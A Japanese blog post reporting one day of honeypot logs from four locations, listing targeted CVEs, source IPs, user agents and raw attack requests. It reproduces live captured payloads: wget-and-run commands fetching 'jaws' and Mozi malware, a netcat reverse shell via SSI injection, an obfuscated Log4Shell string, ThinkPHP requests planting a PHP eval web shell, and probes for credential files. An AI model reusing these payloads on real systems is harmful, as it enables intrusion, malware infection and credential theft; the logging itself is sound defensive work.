コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2022/04/25 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2022/04/25分です。

特徴
共通

Axis製品の脆弱性を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
/.envへのスキャン行為

Location:JP

Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
.jsへのスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為
Laravelへのスキャン行為
5.188.210.227に関する不正通信
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 23.94.50.159/jaws;
sh /tmp/jaws
Location:US

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
/.awsへのスキャン行為
/.gitへのスキャン行為
Apache Solrへのスキャン行為
WordPressへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  a.tigoinari.tk/jaws;
sh /tmp/jaws
cd /tmp;
rm -rf *;
wget jx.qingdaosheng.com/jaws;
sh /tmp/jaws
Location:UK

GPONルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
.jsへのスキャン行為
/.gitへのスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 2.56.57.238/jaws;
sh /tmp/jaws
cd /tmp;
rm -rf *;
wget 23.94.50.159/jaws;
sh /tmp/jaws
Location:SG

Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
Laravelへのスキャン行為
phpMyAdminへのスキャン行為
5.188.210.227に関する不正通信
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 110.45.146.209/jaws;
sh /tmp/jaws
cd /tmp;
rm -rf *;
wget 23.94.50.159/jaws;
sh /tmp/jaws
cd /tmp;
rm -rf *;
wget http://103.217.123.39:38037/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
アクセス数推移

JP:総アクセス数:72 (前日比:-32)
US:総アクセス数:88 (前日比:11)
UK:総アクセス数:50 (前日比:-37)
SG:総アクセス数:83 (前日比:6)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 3.140.186.231 United States
1 5.188.210.227 Russia
9 20.119.229.132 United States
1 41.151.23.74 South Africa
2 41.237.175.238 Egypt
1 41.239.81.41 Egypt
1 45.83.66.82 Germany
1 45.148.10.81 Romania
1 45.155.204.146 Russia
2 52.247.111.85 United States
1 85.202.169.124 Netherlands
16 95.214.235.205 Ukraine
2 109.237.103.9 Russia
7 135.125.244.48 France
7 135.125.246.110 France
1 160.178.90.125 Morocco
1 161.35.133.73 United States
1 165.227.118.142 United States
1 167.71.218.38 United States
8 185.254.196.217 Ukraine
1 188.166.71.137 United States
1 193.169.245.94 Ukraine
1 205.185.120.72 United States
1 205.185.126.177 United States
1 205.210.31.29 United States
1 206.189.224.36 United States
1 220.198.223.107 China

UserAgent一覧

件数 UserAgent
6 -
3 Hello, world
1 Mozila/5.0
1 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
43 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 (iPad; CPU OS 10_1_1 like Mac OS X) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0 Mobile/14B150 Safari/602.1
9 Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
2 python-requests/2.22.0
1 t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//200[.]150[.]197[.]116:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzIwMC4xNTAuMTk2LjI0OC84VXNBLnNoOyBjdXJsIC1PIGh0dHA6Ly8yMDAuMTUwLjE5Ni4yNDgvOFVzQS5zaDsgY2htb2QgNzc3IDhVc0Euc2g7IHNoIDhVc0Euc2g=}')

リクエスト内容一覧

件数 Method Request Protocol
1 \x16\x03\x01\x01D\x01
2 \x16\x03\x01
1 GET /.aws/credentials HTTP/1.1
1 GET /.env.bak HTTP/1.1
43 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /:80:undefined?id= HTTP/1.1
1 GET /User/User.ashx?act=Login HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /_profiler/phpinfo HTTP/1.1
1 GET /aws.yml HTTP/1.1
1 GET /config.js HTTP/1.1
1 GET /config/aws.yml HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%20193.124.7.9%2031337%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e HTTP/1.0\n
1 GET /info.php HTTP/1.1
2 GET /js/app.15bf29f5.1650555783284.js?_t=1650555783284 HTTP/1.1
1 GET /phpinfo.php HTTP/1.1
1 GET /phpinfo HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
3 GET /shell?cd+/tmp;rm+-rf+*;wget+23[.]94[.]50[.]159/jaws;sh+/tmp/jaws HTTP/1.1
1 GET http[:]//5[.]188[.]210[.]227/echo.php HTTP/1.1
1 POST /HNAP1/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
15 20.225.248.180 United States
1 23.129.64.135 United States
1 42.51.55.235 China
1 45.148.10.81 Romania
4 45.155.204.146 Russia
2 49.235.250.133 China
10 51.79.29.48 Canada
1 52.247.111.85 United States
1 58.249.9.186 China
1 75.12.16.159 United States
1 92.118.39.13 Romania
14 103.139.44.31 Vietnam
2 109.237.103.9 Russia
1 112.94.96.150 China
1 115.61.172.37 China
13 128.199.2.117 United Kingdom
1 142.93.194.204 United States
1 147.182.255.250 United States
2 162.220.164.92 United States
1 167.94.145.60 United States
1 183.136.225.42 China
7 185.254.196.223 Ukraine
1 193.124.7.9 Czechia
1 198.235.24.137 United States
1 206.189.224.36 United States
1 209.141.62.69 United States
2 213.226.123.30 Russia

UserAgent一覧

件数 UserAgent
9 -
1 Hello, world
1 Mozilla/5.0 (Linux; Android 8.1.0; Moto G (5S)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.64 Mobile Safari/537.36
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
13 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
6 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
14 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
2 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
1 Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586
14 Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
22 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 python-requests/2.27.1

リクエスト内容一覧

件数 Method Request Protocol
1 \x16\x03\x01\x01D\x01
1 \x16\x03\x01
23 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET //.aws/credentials/phpinfo HTTP/1.1
1 GET //.env.1 HTTP/1.1
1 GET //.env.bak HTTP/1.1
1 GET //.env.example.1 HTTP/1.1
1 GET //.env.example.suspected HTTP/1.1
1 GET //.env.example HTTP/1.1
1 GET //.env.suspected HTTP/1.1
1 GET //.env_bak HTTP/1.1
1 GET //.env_old HTTP/1.1
1 GET //.env HTTP/1.1
1 GET //aws[.]yml HTTP/1.1
1 GET //config/aws.yml HTTP/1.1
1 GET //info[.]php HTTP/1.1
1 GET //phpinfo[.]php HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /User/User.ashx?act=Login HTTP/1.1
1 GET /assets../.git/config HTTP/1.1
1 GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /cgi-bin/.%2e/%2e%2e/.git/config HTTP/1.1
1 GET /cgi-bin/.%2e/.git/config HTTP/1.1
1 GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /content../.git/config HTTP/1.1
1 GET /css../.git/config HTTP/1.1
1 GET /events../.git/config HTTP/1.1
2 GET /favicon.ico HTTP/1.1
1 GET /images../.git/config HTTP/1.1
1 GET /img../.git/config HTTP/1.1
2 GET /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%20193.124.7.9%2031337%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e HTTP/1.0\n
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /js../.git/config HTTP/1.1
1 GET /js/app.15bf29f5.1650555783284.js?_t=1650555783284 HTTP/1.1
1 GET /lib../.git/config HTTP/1.1
1 GET /media../.git/config HTTP/1.1
1 GET /news/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /phpmyadmin/index.php HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+ a.tigoinari.tk/jaws;sh+/tmp/jaws
1 GET /shell?cd+/tmp;rm+-rf+*;wget+jx[.]qingdaosheng[.]com/jaws;sh+/tmp/jaws HTTP/1.1
1 GET /site/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /static../.git/config HTTP/1.1
1 GET /test/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /web/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /website/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp-content/ HTTP/1.1
1 GET /wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /xmlrpc.php?rsd HTTP/1.1
1 HEAD / HTTP/1.1
2 POST /HNAP1/ HTTP/1.0
1 PRI * HTTP/2.0
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 18.217.170.51 United States
1 20.51.193.133 United States
2 20.122.1.236 United States
4 23.224.186.225 United States
1 41.45.62.159 Egypt
1 41.47.176.116 Egypt
1 45.83.66.234 Germany
2 45.148.10.81 Romania
5 45.155.204.146 Russia
2 47.107.90.177 China
1 47.108.79.245 China
10 82.196.14.19 United States
2 109.237.103.9 Russia
2 109.237.103.38 Russia
1 115.60.208.197 China
2 124.221.89.105 China
2 157.230.216.203 United States
1 167.248.133.117 United States
1 172.104.138.223 United States
1 188.165.87.103 France
4 193.124.7.9 Czechia
1 201.218.229.228 Panama
1 205.185.123.167 United States
1 205.210.31.18 United States

UserAgent一覧

件数 UserAgent
11 -
4 Go-http-client/1.1
3 Hello, world
1 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.5); .NET CLR 1.1.4322)
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
5 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
2 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
1 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
9 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
2 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 Gecko/20100101
1 python-requests/2.22.0
2 python-requests/2.27.1

リクエスト内容一覧

件数 Method Request Protocol
1 \x16\x03\x01\x01C\x01
1 \x16\x03\x01\x01D\x01
2 \x16\x03\x01
3 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /TP/html/public/index.php HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
1 GET /User/User.ashx?act=Login HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /elrekt.php HTTP/1.1
3 GET /favicon.ico HTTP/1.1
1 GET /fuN3 HTTP/1.0
1 GET /html/public/index.php HTTP/1.1
3 GET /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%20193.124.7.9%2031337%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e HTTP/1.0\n
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1
2 GET /index.php HTTP/1.1
1 GET /language/Swedish${IFS}&&echo${IFS}1>test&&tar${IFS}/string.js HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /phpmyadmin/index.php HTTP/1.1
1 GET /public/index.php HTTP/1.1
1 GET /pv/aastra.cfg HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//115[.]60[.]208[.]197:53227/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
2 GET /shell?cd+/tmp;rm+-rf+*;wget+23[.]94[.]50[.]159/jaws;sh+/tmp/jaws HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+2[.]56[.]57[.]238/jaws;sh+/tmp/jaws HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /thinkphp/html/public/index.php HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/ HTTP/1.1
1 HEAD /fileadmin/index.php HTTP/1.1
1 HEAD /kj/config.js HTTP/1.1
2 POST /boaform/admin/formLogin HTTP/1.1
1 POST /index.php?s=captcha HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 PRI * HTTP/2.0
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
2 5.62.20.17 United Kingdom
1 5.188.210.227 Russia
1 20.205.157.102 United States
4 23.224.186.222 United States
1 41.42.75.72 Egypt
1 45.83.67.35 Germany
2 45.148.10.81 Romania
5 45.155.204.146 Russia
11 51.79.29.48 Canada
1 68.183.194.7 United States
1 103.41.24.14 India
23 103.160.212.167 Indonesia
1 103.217.123.39 India
1 104.131.15.184 United States
2 109.237.103.9 Russia
1 110.11.51.149 South Korea
1 120.86.252.32 China
1 142.93.194.204 United States
2 157.230.216.203 United States
1 162.142.125.8 United States
1 167.94.138.63 United States
1 167.94.138.120 United States
2 167.99.156.187 United States
1 172.245.21.135 United States
8 185.254.196.223 Ukraine
2 193.124.7.9 Czechia
1 194.31.98.165 Netherlands
1 205.185.113.102 United States
1 205.210.31.31 United States
1 206.189.224.36 United States
1 209.141.44.145 United States

UserAgent一覧

件数 UserAgent
12 -
3 Go-http-client/1.1
1 Hello, World
3 Hello, world
1 Mozila/5.0
1 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
1 Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1
3 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/418.9.1 (KHTML, like Gecko) Safari/419.3
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
5 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
25 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
21 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)
1 python-requests/2.22.0
1 t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//200[.]150[.]197[.]116:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzIwMC4xNTAuMTk2LjI0OC84VXNBLnNoOyBjdXJsIC1PIGh0dHA6Ly8yMDAuMTUwLjE5Ni4yNDgvOFVzQS5zaDsgY2htb2QgNzc3IDhVc0Euc2g7IHNoIDhVc0Euc2g=}')

リクエスト内容一覧

件数 Method Request Protocol
1 \x16\x03\x01\x01D\x01
2 \x16\x03\x01
27 GET /.env HTTP/1.1
1 GET /:80:undefined?id= HTTP/1.1
1 GET /GponForm/diag_FORM?images/ HTTP/1.1
1 GET /User/User.ashx?act=Login HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
2 GET /favicon.ico HTTP/1.1
3 GET /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%20193.124.7.9%2031337%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e HTTP/1.0
1 GET /index.php/?a=display&templateFile=%3C%3Fphp%20file%5Fput%5Fcontents%28%27spread.php%27%2C%27%3C%3Fphp%20%2Beval%28%24%5FPOST%5Bspread%5D%29%3B%3F%3E%27%29%3Bdie%28%29%3B%3F%3E HTTP/1.1
1 GET /index.php/?a=display&templateFile=data/runtime/Logs/Portal/22_04_24.log HTTP/1.1
1 GET /index.php?a=fetch&templateFile=public/index&prefix=''&content=%3Cphp%3Efile_put_contents('spread.php','%3C?php%20@eval($_POST%5Bspread%5D);?%3E') HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /index.php?s=index/%5Cthink%5CContainer/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=spread.php&vars%5B1%5D%5B%5D=%3C?php%20@eval($_POST%5Bspread%5D);?%3E HTTP/1.1
1 GET /index.php?s=index/%5Cthink%5CContainer/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=spread.php&vars%5B1%5D%5B1%5D=%3C?php%20@eval($_POST%5Bspread%5D);?%3E HTTP/1.1
1 GET /index.php?s=index/%5Cthink%5CRequest/input&cacheFile=spread.php&content=%3C?php%20@eval($_POST%5Bspread%5D);?%3E HTTP/1.1
1 GET /index.php?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=spread.php&vars%5B1%5D%5B%5D=%3C?php%20@eval($_POST%5Bspread%5D);?%3E HTTP/1.1
1 GET /index.php?s=index/%5Cthink%5Ctemplate%5Cdriver%5Cfile/write&cacheFile=spread.php&content=%3C?php%20@eval($_POST%5Bspread%5D);?%3E HTTP/1.1
1 GET /index.php?s=index/%5Cthink%5Cview%5Cdriver%5CPhp/display&cacheFile=spread.php&content=%3C?php%20@eval($_POST%5Bspread%5D);?%3E HTTP/1.1
3 GET /index.php HTTP/1.1
1 GET /js/app.15bf29f5.1650555783284.js?_t=1650555783284 HTTP/1.1
1 GET /menu.html?images/ HTTP/1.1
1 GET /phpmyadmin/index.php HTTP/1.1
1 GET /pmd/index.php HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+110[.]45[.]146[.]209/jaws;sh+/tmp/jaws HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+23[.]94[.]50[.]159/jaws;sh+/tmp/jaws HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//103[.]217[.]123[.]39:38037/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET http[:]//5[.]188[.]210[.]227/echo.php HTTP/1.1
1 HEAD / HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /boaform/admin/formLogin HTTP/1.1
3 POST /index.php/?s=captcha HTTP/1.1
4 POST /spread.php HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
3 PRI * HTTP/2.0